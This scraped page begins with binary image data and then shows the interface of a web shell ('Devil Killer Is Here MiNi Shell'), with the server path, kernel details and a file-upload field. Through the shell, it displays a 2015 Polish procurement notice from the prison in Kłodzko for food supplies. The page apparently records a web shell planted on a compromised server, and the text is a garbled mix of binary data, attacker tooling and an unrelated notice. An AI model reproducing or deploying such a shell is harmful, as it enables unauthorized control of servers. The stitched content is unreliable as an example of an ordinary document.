JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20151029/290760-N-2015.html

<p class="kh_header"><b>Kłodzko: DD/ZP 220/9/2015 POSTĘPOWANIE NA DOSTAWĘ ARTYKUŁÓW SPOŻYWCZYCH</b><br>
<b>Numer ogłoszenia: 290760 - 2015; data zamieszczenia: 29.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny w Kłodzku , ul. Bohaterów Getta 16, 57-300 Kłodzko, woj. dolnośląskie, tel. 074 8651800, 8651854, faks 074 8673017.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: ZAKŁAD KARNY KŁODZKO.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DD/ZP 220/9/2015 POSTĘPOWANIE NA DOSTAWĘ ARTYKUŁÓW SPOŻYWCZYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I: PRZYPRAWY:
1) Bulion grzybowy CPV 15872200-3 opakowanie jednostkowe 1-20 kg;
2) Czosnek mielony CPV 15332140-7 opakowanie 1-5 kg;
3) Keczup CPV 15871230-5 opakowanie 1 kg;
4) Koperek suszony CPV 15870000-7 opakowanie 0,5-1 kg;
5) Liść laurowy CPV 15870000-7 opakowanie 0,5-1 kg;
6) Majeranek CPV 15871000-0 opakowanie 0,5-5 kg;
7) Majonez CPV 15871273-8 opakowanie 1 kg;
8) Musztarda CPV 15871250-1 opakowanie 1 kg;
9) Papryka CPV 15871200-6 opakowanie 1-5 kg;
10) Przyprawa do kurczaka CPV 15871200-6 opakowanie 1-5 kg;
11) Przyprawy sypkie typu jarzynka CPV 15891000-0 opakowanie 1-5 kg;
12) Rosół wołowy CPV 15872400-5 opakowanie 1-5 kg;
13) Ziele angielskie CPV 15870000-7 opakowanie 1-5 kg;
14) Zupa pieczarkowa CPV 15891000-0 opakowanie 1-5 kg;
15) Przyprawa do gulaszu CPV 158910000-0 opakowanie 0,1-1 kg;

Dostarczony towar ma być w opakowaniach. Na każdym dostarczonym produkcie musi być etykieta z następującymi danymi:
nazwa oraz adres dostawcy lub producenta;
nazwa oraz rodzaj produktu;
termin przydatności do spożycia min. 6 mies. od dostawy;
warunki przechowywania;
skład i waga.

CZĘŚĆ II: NAPOJE
1) Woda mineralna CPV 15981200-0 opakowanie 1,5 litra
Opakowanie jednostkowe 1,5 litra pakowane zbiorczo w zgrzewki 6 szt. Wszystkie artykuły oznakowane etykietą producenta zgodnie z przepisami. Termin przydatności do spożycia określony na etykiecie - minimum 6 mies. od daty dostawy

CZĘŚĆ III: ZBOŻOWE-STRĄCZKOWE
1) Ryż CPV 15614100-6 biały, długoziarnisty, opakowanie od 1 do 20 kg;
2) Fasola CPV 03221210-1 biała, opakowanie od 5 do 20 kg;
3) Maka pszenna CPV 15614100-6 typ 450-550, opakowanie od 1 do 20 kg;
4) Mąka ziemniaczana CPV 15620000-0 opakowanie od 1 do 20 kg;
5) Makaron świderki CPV 15613300-1 opakowanie od 10 do 20 kg;
6) Bułka tarta CPV 15811500-1 opakowanie od 0,5 do 5 kg;
7) Kawa zbożowa CPV 15862000-8 opakowanie od 0,5 do 25 kg;

Na każdym dostarczonym produkcie musi być etykieta z następującymi danymi:
nazwa oraz adres dostawcy lub producenta;
nazwa oraz rodzaj produktu;
termin przydatności do spożycia min. 3 mies. od dostawy;
warunki przechowywania;
skład i waga.

CZĘŚĆ IV: WARZYWA
1) Ogórek kiszony CPV 15331000-7 opakowanie worki plastikowe od 5 do 10 kg lub wiadra plastikowe od 10 do 20 kg. Nie dopuszcza się dostaw w beczkach.

Opis jakości: produkt dostarczony w sztukach, nie rozdrobniony, smak i zapach - charakterystyczny dla ogórka kiszonego, aromatyczny, słono-kwaśny bez posmaków i zapachów obcych, jędrność - sztuki jędrne, chrupkie, wygląd soku - jasno-szaro-zielony.


CZĘŚĆ V: KONSERWOWE
1) Koncentrat pomidorowy CPV 15871230-5 opakowanie od 0,9 do 2 kg;
2) Fasolka szparagowa konserwowa CPV 15331400-1 opakowanie od 0,5 do 2 kg;
3) Groszek konserwowy CPV 15331400-1 opakowanie od 0,2 do 2 kg;
4) Fasolka konserwowa czerwona CPV 15331400-1 opakowanie  od 0,5 do 2 kg;
5) Fasolka konserwowa biała CPV 15331400-1 opakowanie od 0,5 do 2 kg;
6) Kukurydza konserwowa CPV 15331400-1 opakowanie od 0,2 do 2 kg;

Na każdym dostarczonym produkcie musi być etykieta z następującymi danymi:
nazwa oraz adres dostawcy lub producenta;
nazwa oraz rodzaj produktu;
termin przydatności do spożycia min. 6 mies. od dostawy;
warunki przechowywania;
skład i waga.

CZĘŚĆ VI: NABIAŁ 
1) Mleko w proszku CPV 15511700-0 opakowanie jednostkowe 5-25 kg;
2) Ser twaróg chudy CPV 15542100-0 opakowanie jednostkowe 250 g kostka;
3) Serek do chleba CPV 15500000-3 opakowanie jednostkowe 100 g - bez dodatków żelatyny wieprzowej oraz bez dodatków smakowych;
4) Serek homogenizowany CPV 15881000-7 opakowanie jednostkowe 150 g  - bez dodatków żelatyny wieprzowej; 

Wszystkie wyroby muszą być oznakowane etykietą zawierającą wszystkie niezbędne informacje o produkcie, skład wyrobu, kaloryczności, numerze normy produkcyjnej.
Wszystkie artykułu muszą stanowić jednorodną partię, a okres przydatności do spożycia wynosi następująco:
pozycja nr 1 mleko w proszku - min. 6 mies. od daty dostawy;
pozycja nr 2 ser twaróg chudy - min. 14 dni od daty dostawy;
pozycja nr 3 serek do chleba - min. 21 dni od daty dostawy;
pozycja nr 4 serek homogenizowany - min. 21 dni od daty dostawy;
Inne informacje:
pakowanie - w pojemnikach z podziałem asortymentowym,
przechowywanie - warunki składowania określone na opakowaniu jednostkowym.

CZĘŚĆ VII: JAJA
1) Jaja klasa A (konsumpcyjne) CPV 03142500-3 kategoria wagowa M

Inne informacje o produkcie:
pakowanie - w pojemnikach przeznaczonych do transportu jaj;
znakowanie - etykietą zgodnie z obowiązującymi przepisami w języku polskim;
termin przydatności do spożycia - znakowanie czytelne na opakowaniu jednostkowym zgodnie z obowiązującymi przepisami min. 21 dni;
przechowywanie - warunki składowania określone na opakowaniu  jednostkowym i zgodne z warunkami systemu HACCP dla tego produktu.

CZĘŚĆ VIII: TŁUSZCZE
1) Tłuszcz do smarowania pieczywa CPV 15430000-1 opakowanie jednostkowe 0,25 kg. Tłuszcz roślinny - produkt przeznaczony do spożycia w formie gotowej (np. do smarowania pieczywa), a także przeznaczony do obróbki termicznej (np. do sporządzenia zasmażek, sosów itp.)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.30-5, 15.33.10.00-7, 15.54.21.00-0, 03.14.25.00-3, 15.43.00.00-1, 15.61.41.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Załącznik nr 1 oraz 2 prawidłowo wypełniony</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy na następujących warunkach:
a) wszelkie zmiany dopuszcza się nie wcześniej niż po upływie połowy okresu na jaki została zawarta umowa.
 b) wszelkich zmian zawartej umowy można dokonać tylko jeden raz w trakcie trwania umowy.
c) zmian dokonuje się na pisemny wniosek Wykonawcy, który powinien zawierać szczegółową analizę warunków rynkowych oraz wszelką dokumentację (kserokopie pism producentów, innych dostawców itp.) potwierdzającą zmiany na jakie powołuje się Wykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny 
Bohaterów Getta 16 
57-300 Kłodzko 
7:15-15:15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.11.2015 godzina 12:00, miejsce: Zakład Karny 
Bohaterów Getta 16 
57-300 Kłodzko 
7:15-15:15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przyprawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ I: PRZYPRAWY:
1) Bulion grzybowy CPV 15872200-3 opakowanie jednostkowe 1-20 kg;
2) Czosnek mielony CPV 15332140-7 opakowanie 1-5 kg;
3) Keczup CPV 15871230-5 opakowanie 1 kg;
4) Koperek suszony CPV 15870000-7 opakowanie 0,5-1 kg;
5) Liść laurowy CPV 15870000-7 opakowanie 0,5-1 kg;
6) Majeranek CPV 15871000-0 opakowanie 0,5-5 kg;
7) Majonez CPV 15871273-8 opakowanie 1 kg;
8) Musztarda CPV 15871250-1 opakowanie 1 kg;
9) Papryka CPV 15871200-6 opakowanie 1-5 kg;
10) Przyprawa do kurczaka CPV 15871200-6 opakowanie 1-5 kg;
11) Przyprawy sypkie typu jarzynka CPV 15891000-0 opakowanie 1-5 kg;
12) Rosół wołowy CPV 15872400-5 opakowanie 1-5 kg;
13) Ziele angielskie CPV 15870000-7 opakowanie 1-5 kg;
14) Zupa pieczarkowa CPV 15891000-0 opakowanie 1-5 kg;
15) Przyprawa do gulaszu CPV 158910000-0 opakowanie 0,1-1 kg;

Dostarczony towar ma być w opakowaniach. Na każdym dostarczonym produkcie musi być etykieta z następującymi danymi:
nazwa oraz adres dostawcy lub producenta;
nazwa oraz rodzaj produktu;
termin przydatności do spożycia min. 6 mies. od dostawy;
warunki przechowywania;
skład i waga..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.22.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ II: NAPOJE
1) Woda mineralna CPV 15981200-0 opakowanie 1,5 litra
Opakowanie jednostkowe 1,5 litra pakowane zbiorczo w zgrzewki 6 szt. Wszystkie artykuły oznakowane etykietą producenta zgodnie z przepisami. Termin przydatności do spożycia określony na etykiecie - minimum 6 mies. od daty dostawy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zbożowe-strączkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ III: ZBOŻOWE-STRĄCZKOWE
1) Ryż CPV 15614100-6 biały, długoziarnisty, opakowanie od 1 do 20 kg;
2) Fasola CPV 03221210-1 biała, opakowanie od 5 do 20 kg;
3) Maka pszenna CPV 15614100-6 typ 450-550, opakowanie od 1 do 20 kg;
4) Mąka ziemniaczana CPV 15620000-0 opakowanie od 1 do 20 kg;
5) Makaron świderki CPV 15613300-1 opakowanie od 10 do 20 kg;
6) Bułka tarta CPV 15811500-1 opakowanie od 0,5 do 5 kg;
7) Kawa zbożowa CPV 15862000-8 opakowanie od 0,5 do 25 kg;

Na każdym dostarczonym produkcie musi być etykieta z następującymi danymi:
nazwa oraz adres dostawcy lub producenta;
nazwa oraz rodzaj produktu;
termin przydatności do spożycia min. 3 mies. od dostawy;
warunki przechowywania;
skład i waga..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.41.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warzywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ IV: WARZYWA
1) Ogórek kiszony CPV 15331000-7 opakowanie worki plastikowe od 5 do 10 kg lub wiadra plastikowe od 10 do 20 kg. Nie dopuszcza się dostaw w beczkach.

Opis jakości: produkt dostarczony w sztukach, nie rozdrobniony, smak i zapach - charakterystyczny dla ogórka kiszonego, aromatyczny, słono-kwaśny bez posmaków i zapachów obcych, jędrność - sztuki jędrne, chrupkie, wygląd soku - jasno-szaro-zielony..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.10.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ V: KONSERWOWE
1) Koncentrat pomidorowy CPV 15871230-5 opakowanie od 0,9 do 2 kg;
2) Fasolka szparagowa konserwowa CPV 15331400-1 opakowanie od 0,5 do 2 kg;
3) Groszek konserwowy CPV 15331400-1 opakowanie od 0,2 do 2 kg;
4) Fasolka konserwowa czerwona CPV 15331400-1 opakowanie  od 0,5 do 2 kg;
5) Fasolka konserwowa biała CPV 15331400-1 opakowanie od 0,5 do 2 kg;
6) Kukurydza konserwowa CPV 15331400-1 opakowanie od 0,2 do 2 kg;

Na każdym dostarczonym produkcie musi być etykieta z następującymi danymi:
nazwa oraz adres dostawcy lub producenta;
nazwa oraz rodzaj produktu;
termin przydatności do spożycia min. 6 mies. od dostawy;
warunki przechowywania;
skład i waga..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.12.30-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ VI: NABIAŁ 
1) Mleko w proszku CPV 15511700-0 opakowanie jednostkowe 5-25 kg;
2) Ser twaróg chudy CPV 15542100-0 opakowanie jednostkowe 250 g kostka;
3) Serek do chleba CPV 15500000-3 opakowanie jednostkowe 100 g - bez dodatków żelatyny wieprzowej oraz bez dodatków smakowych;
4) Serek homogenizowany CPV 15881000-7 opakowanie jednostkowe 150 g  - bez dodatków żelatyny wieprzowej; 

Wszystkie wyroby muszą być oznakowane etykietą zawierającą wszystkie niezbędne informacje o produkcie, skład wyrobu, kaloryczności, numerze normy produkcyjnej.
Wszystkie artykułu muszą stanowić jednorodną partię, a okres przydatności do spożycia wynosi następująco:
pozycja nr 1 mleko w proszku - min. 6 mies. od daty dostawy;
pozycja nr 2 ser twaróg chudy - min. 14 dni od daty dostawy;
pozycja nr 3 serek do chleba - min. 21 dni od daty dostawy;
pozycja nr 4 serek homogenizowany - min. 21 dni od daty dostawy;
Inne informacje:
pakowanie - w pojemnikach z podziałem asortymentowym,
przechowywanie - warunki składowania określone na opakowaniu jednostkowym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.54.21.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
